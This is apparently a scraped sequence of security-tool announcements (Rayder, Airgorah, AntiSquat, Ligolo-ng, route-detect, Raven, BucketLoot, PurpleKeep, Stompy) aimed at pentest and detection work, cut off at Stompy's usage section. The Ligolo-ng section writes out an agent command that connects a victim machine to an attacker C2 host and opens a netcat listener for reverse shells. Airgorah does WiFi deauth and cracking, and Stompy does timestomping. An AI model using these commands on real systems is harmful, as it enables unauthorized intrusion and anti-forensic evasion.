Example

Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

vars:
ORG: "example.org"
OUTPUT_DIR: "results"

modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"

parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false

- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true

- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false

- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 0 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.

Workflows

Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!

Inspiration

Inspiration of this project comes from Awesome taskfile project.



Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R
24 January 2024 at 11:30


Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

Requirements

This software only works on linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under MIT license.

Contributing

If you have any question about the usage of the application, do not hesitate to open a discussion

If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request



Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

By: Zion3R
25 January 2024 at 11:30


AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


How to use

  • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
  • Install all dependencies by typing pip install -r requirements.txt.
  • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
  • Create a file named .openai-key and paste your chatgpt api key in there.
  • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
  • Create a file named β€˜domains.txt’. Type in a line-separated list of domains you’d like to scan.
  • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
  • Run antisquat using python3.8 antisquat.py domains.txt

Examples:

Let’s say you’d like to run antisquat on "flipkart.com".

Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.

Test case:

A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py

Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

If you'd like to know more about the tool, make sure to check out our blog.

Acknowledgements

To know more about our Attack Surface Management platform, check out NVADR.



Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R
26 January 2024 at 11:30


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
[...]
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Interface 3 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Name β”‚ wlp3s0 β”‚
β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
β”‚ MTU β”‚ 1500 β”‚
β”‚ Flags β”‚ up|broadcast|multicast β”‚
β”‚ IPv4 Address β”‚ 192.168.0.30/24 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx MΓ©t MTU Γ‰tat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active listeners β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
β”‚ # β”‚ AGENT β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234 β”‚ 127.0.0.1:4321 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


Route-Detect - Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes

By: Zion3R
27 January 2024 at 11:30


Find authentication (authn) and authorization (authz) security bugs in web application routes:


Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:

Supported web frameworks (route-detect IDs in parentheses):

  • Python: Django (django, django-rest-framework), Flask (flask), Sanic (sanic)
  • PHP: Laravel (laravel), Symfony (symfony), CakePHP (cakephp)
  • Ruby: Rails* (rails), Grape (grape)
  • Java: JAX-RS (jax-rs), Spring (spring)
  • Go: Gorilla (gorilla), Gin (gin), Chi (chi)
  • JavaScript/TypeScript: Express (express), React (react), Angular (angular)

*Rails support is limited. Please see this issue for more information.

Installing

Use pip to install route-detect:

$ python -m pip install --upgrade route-detect

You can check that route-detect is installed correctly with the following command:

$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.

Findings:

/tmp/stdin
routes.rules.test-route-detect
Found '1 == 1', your route-detect installation is working correctly

1Ò”† print(1 == 1)


Ran 1 rule on 1 file: 1 finding.

Using

route-detect provides the routes CLI command and uses semgrep to search for routes.

Use the which subcommand to point semgrep at the correct web application rules:

$ semgrep --config $(routes which django) path/to/django/code

Use the viz subcommand to visualize route information in your browser:

$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json

If you're not sure which framework to look for, you can use the special all ID to check everything:

$ semgrep --json --config $(routes which all) --output routes.json path/to/code

If you have custom authn or authz logic, you can copy route-detect's rules:

$ cp $(routes which django) my-django.yml

Then you can modify the rule as necessary and run it like above:

$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json

Contributing

route-detect uses poetry for dependency and configuration management.

Before proceeding, install project dependencies with the following command:

$ poetry install --with dev

Linting

Lint all project files with the following command:

$ poetry run pre-commit run --all-files

Testing

Run Python tests with the following command:

$ poetry run pytest --cov

Run Semgrep rule tests with the following command:

$ poetry run semgrep --test --config routes/rules/ tests/test_rules/


Raven - CI/CD Security Analyzer

By: Zion3R
28 January 2024 at 11:30


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to setup the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool contains three main functionalities, download and index and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

  • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R
29 January 2024 at 11:30


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests

By: Zion3R
30 January 2024 at 11:30


With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.

To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.

Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.

Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.

To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.

TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.


Requirements

The project is based on Azure Pipelines and requires the following to be able to run:

  • Azure Service Connection to a resource group as described in the Microsoft Docs
  • Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
  • MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines

Optional

You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.

Refer to the variables file for your configurable items.

Design

Infrastructure

Deploying the infrastructure uses the Azure Pipeline to perform the following steps:

  • Deploy Azure services:
    • Key Vault
    • Log Analytics Workspace
    • Data Connection Endpoint
    • Data Connection Rule
  • Generate SSH keypair and password for the Windows account and store in the Key Vault
  • Create a Windows 11 VM
  • Install OpenSSH
  • Configure and deploy the SSH public key
  • Install Invoke-AtomicRedTeam
  • Install Microsoft Defender for Endpoint and configure exceptions
  • (Optional) Apply security and/or audit policy files
  • Reboot

Simulation

Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:

  • T1059.003
  • T1027,T1049,T1003

The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.

There are currently two ways to run the simulation:

Rotating simulation

This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.

Warning: this will onboard a large number of hosts into your EDR

Single deploy simulation

A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.

TODO

Must have

  • Check if pre-reqs have been fullfilled before executing the atomic
  • Provide the ability to import own group policy
  • Cleanup biceps and pipelines by using a master template (Complete build)
  • Build pipeline that runs technique sequently with reboots in between
  • Add Azure ServiceConnection to variables instead of parameters

Nice to have

  • MDE Off-boarding (?)
  • Automatically join and leave AD domain
  • Make Atomics repository configureable
  • Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
  • Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
  • Add C2 infrastructure for manual or C2 based simulations

Issues

  • Atomics do not return if a simulation succeeded or not
  • Unreliable OpenSSH extension installer failing infrastructure deployment
  • Spamming onboarded devices in the EDR

References



Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

By: Zion3R
31 January 2024 at 11:30


A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

  • Change timestamps for individual files or directories.
  • Recursively apply timestamps to all files in a directory.
  • Option to use specific credentials for remote paths or privileged files.

I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.

Usage

